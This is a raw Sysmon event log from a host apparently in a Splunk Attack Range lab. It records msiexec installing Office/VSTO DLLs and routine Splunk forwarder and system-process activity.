11241100x800000000000000072438Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.344{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\1033\VSTOLoaderUI.dll2021-04-20 14:56:02.344 11241100x800000000000000072437Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.344{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files\Common Files\microsoft shared\VSTO\10.0\1033\VSTOLoaderUI.dll2021-04-20 14:56:02.344 11241100x800000000000000072436Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.344{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\1033\VSTOInstallerUI.dll2021-04-20 14:56:02.344 11241100x800000000000000072435Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.344{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files\Common Files\microsoft shared\VSTO\10.0\1033\VSTOInstallerUI.dll2021-04-20 14:56:02.344 11241100x800000000000000072434Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.344{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\3GZ0921M\Microsoft.Office.Tools.Word.dll2021-04-20 14:56:02.344 11241100x800000000000000072433Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.329{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\X9Q0YTQ5\Microsoft.Office.Tools.Word.Implementation.dll2021-04-20 14:56:02.329 11241100x800000000000000072432Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.329{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\ELD0F7DM\Microsoft.VisualStudio.Tools.Office.Word.HostAdapter.v10.0.dll2021-04-20 14:56:02.329 11241100x800000000000000072431Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.313{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\V4P3U21Z\Microsoft.Office.Tools.v4.0.Framework.dll2021-04-20 14:56:02.313 11241100x800000000000000072430Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.313{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\4UX1X4W5\Microsoft.VisualStudio.Tools.Office.Runtime.Internal.dll2021-04-20 14:56:02.313 11241100x800000000000000072429Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.297{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\CX9IVQIZ\Microsoft.VisualStudio.Tools.Office.Runtime.dll2021-04-20 14:56:02.297 11241100x800000000000000072428Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.297{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\KT36INA1\Microsoft.VisualStudio.Tools.Office.Runtime.v10.0.dll2021-04-20 14:56:02.297 11241100x800000000000000072427Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.282{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\FB36EZ9Y\Microsoft.Office.Tools.Outlook.dll2021-04-20 14:56:02.282 11241100x800000000000000072426Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.282{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\DCJU55IR\Microsoft.Office.Tools.Outlook.Implementation.dll2021-04-20 14:56:02.282 11241100x800000000000000072425Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.282{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\Z71G6DM4\Microsoft.VisualStudio.Tools.Office.Outlook.HostAdapter.v10.0.dll2021-04-20 14:56:02.282 11241100x800000000000000072424Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.266{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\7JOPWKO8\Microsoft.Office.Tools.Excel.dll2021-04-20 14:56:02.266 11241100x800000000000000072423Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.266{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\WCZUCJL5\Microsoft.Office.Tools.Excel.Implementation.dll2021-04-20 14:56:02.266 11241100x800000000000000072422Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.251{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\9VCZABJR\Microsoft.VisualStudio.Tools.Office.Excel.HostAdapter.v10.0.dll2021-04-20 14:56:02.251 11241100x800000000000000072421Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.251{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\AU356QPQ\Microsoft.Office.Tools.dll2021-04-20 14:56:02.251 11241100x800000000000000072420Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.251{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\XCMSQQ0S\Microsoft.VisualStudio.Tools.Office.ContainerControl.dll2021-04-20 14:56:02.251 11241100x800000000000000072419Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.235{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\AWVZPENW\Microsoft.Office.Tools.Common.dll2021-04-20 14:56:02.235 11241100x800000000000000072418Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.235{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\MXFW8VNR\Microsoft.Office.Tools.Common.Implementation.dll2021-04-20 14:56:02.235 11241100x800000000000000072417Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.219{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\PIZ1T6Q1\Microsoft.VisualStudio.Tools.Office.AppInfoDocument.v9.0.dll2021-04-20 14:56:02.219 23542300x800000000000000072416Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:02.219{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CD75E918DA14E3A75D48091802589AFD,SHA256=71E0F3921FEF77E1E708C6D2D1119716CC256E00F1109937F4AC18A771CD4069,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000072415Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.219{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\5FI0F89M\Microsoft.VisualStudio.Tools.Applications.ServerDocument.dll2021-04-20 14:56:02.219 23542300x800000000000000072414Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:02.219{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=945C692D2EC9BC823679803EB19308A6,SHA256=DA782B542B385192A1FC26A2B31DF6CA55CCD15903F8A98C151A6BF2DA471306,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000072413Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:02.219{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-EB82-607E-9F0B-00000000BB01}4816C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072412Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:02.219{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072411Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:02.219{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072410Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:02.219{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072409Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:02.219{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072408Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:02.219{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EB82-607E-9F0B-00000000BB01}4816C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 11241100x800000000000000072407Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.219{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\RZ0QFY80\Microsoft.VisualStudio.Tools.Applications.Runtime.dll2021-04-20 14:56:02.219 10341000x800000000000000072406Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:02.219{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-EB82-607E-9F0B-00000000BB01}4816C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000072405Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:02.221{A7A01FEF-EB82-607E-9F0B-00000000BB01}4816C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000072404Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:02.219{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B4225B765FD0127F84995ADAA470B4EC,SHA256=3EC5B91AAF31F7445AE151BB266326D746C3AE9E4ED7A914C6CF9BD4D469AE97,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072403Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:02.219{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=8A144990FA2BFD58907E4E35A9D44F9D,SHA256=0D884BF6AFA2CF9F7CF660C31F9FBE597B55B663534F9C02A83369C699E248A2,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000072402Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.204{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\CSEBSGK6\Microsoft.VisualStudio.Tools.Applications.Hosting.dll2021-04-20 14:56:02.204 11241100x800000000000000072401Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.204{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInSideAdapters\Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v10.0.dll2021-04-20 14:56:02.204 11241100x800000000000000072400Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.204{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\08X5Q9QG\Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v10.0.dll2021-04-20 14:56:02.204 11241100x800000000000000072399Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.204{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\msdatasrc.dll2021-04-20 14:56:02.204 11241100x800000000000000072398Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.188{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\6GR1UFVX\Microsoft.VisualStudio.Tools.Applications.Hosting.v9.0.dll2021-04-20 14:56:02.188 11241100x800000000000000072397Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.188{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\5504EEE0\Microsoft.VisualStudio.Tools.Applications.Hosting.v10.0.dll2021-04-20 14:56:02.188 11241100x800000000000000072396Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.172{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\XOT6QFV6\Microsoft.VisualStudio.Tools.Applications.Adapter.v9.0.dll2021-04-20 14:56:02.172 11241100x800000000000000072395Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.172{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\GP5DBPHF\Microsoft.Office.Tools.Word.v9.0.dll2021-04-20 14:56:02.172 11241100x800000000000000072394Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.157{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\K8MLKCR2\Microsoft.Office.Tools.Common.v9.0.dll2021-04-20 14:56:02.157 11241100x800000000000000072393Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.141{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\EQDKYXLL\Microsoft.Office.Tools.Excel.v9.0.dll2021-04-20 14:56:02.141 11241100x800000000000000072392Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.141{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Microsoft.stdformat.dll2021-04-20 14:56:02.141 11241100x800000000000000072391Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.141{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\H153UW8G\Microsoft.Office.Tools.Outlook.v9.0.dll2021-04-20 14:56:02.141 11241100x800000000000000072390Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.094{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Microsoft.mshtml.dll2021-04-20 14:56:02.094 11241100x800000000000000072389Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.094{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Microsoft.VisualStudio.Tools.Office.Contract.v10.0.dll2021-04-20 14:56:02.094 11241100x800000000000000072388Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.094{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\MCF1VPEA\Microsoft.VisualStudio.Tools.Office.Contract.v10.0.dll2021-04-20 14:56:02.094 11241100x800000000000000072387Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.094{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Microsoft.VisualStudio.Tools.Office.Contract.v9.0.dll2021-04-20 14:56:02.094 11241100x800000000000000072386Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.094{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\UNRYHOPM\Microsoft.VisualStudio.Tools.Office.Contract.v9.0.dll2021-04-20 14:56:02.094 11241100x800000000000000072385Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.079{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\2KCHI2M7\Microsoft.VisualStudio.Tools.Applications.ServerDocument.v10.0.dll2021-04-20 14:56:02.079 11241100x800000000000000072384Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.079{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Microsoft.VisualStudio.Tools.Applications.Contract.v9.0.dll2021-04-20 14:56:02.079 11241100x800000000000000072383Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.079{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\FFNK25CU\Microsoft.VisualStudio.Tools.Applications.Contract.v9.0.dll2021-04-20 14:56:02.079 11241100x800000000000000072382Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.079{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Microsoft.VisualStudio.Tools.Applications.Contract.v10.0.dll2021-04-20 14:56:02.079 11241100x800000000000000072381Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.063{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\5V6JAL75\Microsoft.VisualStudio.Tools.Applications.Contract.v10.0.dll2021-04-20 14:56:02.063 11241100x800000000000000072380Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.063{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files (x86)\Common Files\Microsoft Shared\MSEnv\PublicAssemblies\extensibility.dll2021-04-20 14:56:02.063 11241100x800000000000000072379Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.063{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\adodb.dll2021-04-20 14:56:02.063 11241100x800000000000000072378Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.063{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\System32\msvcr100.dll2021-04-20 14:56:02.063 11241100x800000000000000072377Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.047{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\System32\msvcp100.dll2021-04-20 14:56:02.047 11241100x800000000000000072376Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.047{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\6XXB9Q6Q\extensibility.dll2021-04-20 14:56:02.047 11241100x800000000000000072375Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.047{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\GHWPXN7B\Policy.11.0.Microsoft.Office.Interop.Excel.dll2021-04-20 14:56:02.047 11241100x800000000000000072374Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.016{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\VLY5O3EJ\Microsoft.Office.Interop.Excel.dll2021-04-20 14:56:02.016 11241100x800000000000000072373Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:56:02.001{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\Windows\assembly\tmp\RKCUNGWG\adodb.dll2021-04-20 14:56:02.001 11241100x800000000000000072372Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 